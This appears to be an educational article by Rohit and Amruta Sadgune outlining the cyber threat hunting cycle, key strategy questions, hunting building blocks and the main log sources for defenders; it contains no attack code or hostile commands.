Project Name: Cyber Threat Hunt cycle
Description: – Whenever adversary is changing the routine procedure and evade defenses of enterprises Cyber Threat Hunting will always play very important role to identify such sophisticated attacks. To start with Cyber Threat Hunting we will first understand their cycle to stage platform for more details on hunting.
Author: Rohit D Sadgune / Amruta Sadgune
FAQ: –
- Cyber Threat Hunt cycle
- Different hunting techniques
- Data Sources for Threat Hunting
- Threat Strategy consideration points
Primary Threat Hunting Strategy Questions
There are four important questions required to boost a threat hunting strategy
- What are you hunting?
Threat Hunting is costly and dicey. You must restrict down exactly for which adversaries you are hunting. Is it exploitation? Is it lateral movement? It is exfiltration?
- Where will you find it?
Kindly restrict where you find primary traces of adversaries, build proper hypothesis for same.
- How will you find adversary?
Once you located the specific posture of enterprise and what adversarial effects are you looking for, next step is to choose appropriate solutions. Take on one threat at a time an do proper mapping of adversarial effects with intelligence.
- When will you find it?
Allocate specific team and time to put efforts on one adversary. Have a time bound for your hunting. A never-ending chase will lead you nowhere.
Cyber Threat Hunt cycle
- Survey – Discover entities in the enterprise environment, regulate which entities an adversary is most likely to target and plant sensors to entities to monitor them and collect data on any malicious activity.
- Secure – Catch down the monitored entities to ensure adversaries already in the environment are protected from moving laterally and gaining further access. The protect phase also prevents performance of new adversaries and other exploits.
- Detect – Leverage the threat hunt sensors to robotize observations and data collection capabilities to find proof of successful and failed attacks, and detect adversaries by analyzing the collected events.
- Respond –Terminate the attack by impeding the adversary’s access and protecting it from being regained, repair destruction to compromised entities and inform the appropriate personnel of the actions taken by the threat hunters and the vulnerabilities that still need to be addressed.
Cyber Threat Hunting Building Blocks
- Hypothesis: – Cyber threat hunting is initiated by creating knowledgeable assumptions, about the various types of adversarial effects or activities going on in your enterprise network.
- Analysis: – Identifying relationship between different data sets is an effective technique for positioning events in an understandable way. This includes optical, statistical and machine learning based analysis.
- Deep Dive: – Discover modern, malicious or suspicious patterns and reach to the stage of complex attack path to unveil the adversary tactics, technique and procedures.
- Analytics: – Enriched information with automated machine learning is key for successful threat hunting to identify, investigate and report new attackers encountered during hunting.
Primary Log Sources for Threat Hunting
System logging:- OS logging of the system. Which consists of system, application and security logging.
PowerShell logging:- Granular PowerShell logging to determine the exact nature and source of PowerShell executions
DNS logging:- Logging from DNS servers. Should contain as much information as possible, including source, requested record, size of request and response, etc.
Web server logging:- Logging from web servers that include the request type (GET, PUT, etc.), user-agents, headers and size of the request.
Authentication logging: – Authentication logging from the enterprise. Usually Active Directory logging
End-point forensic information:- Processes currently running on end-points (servers and clients)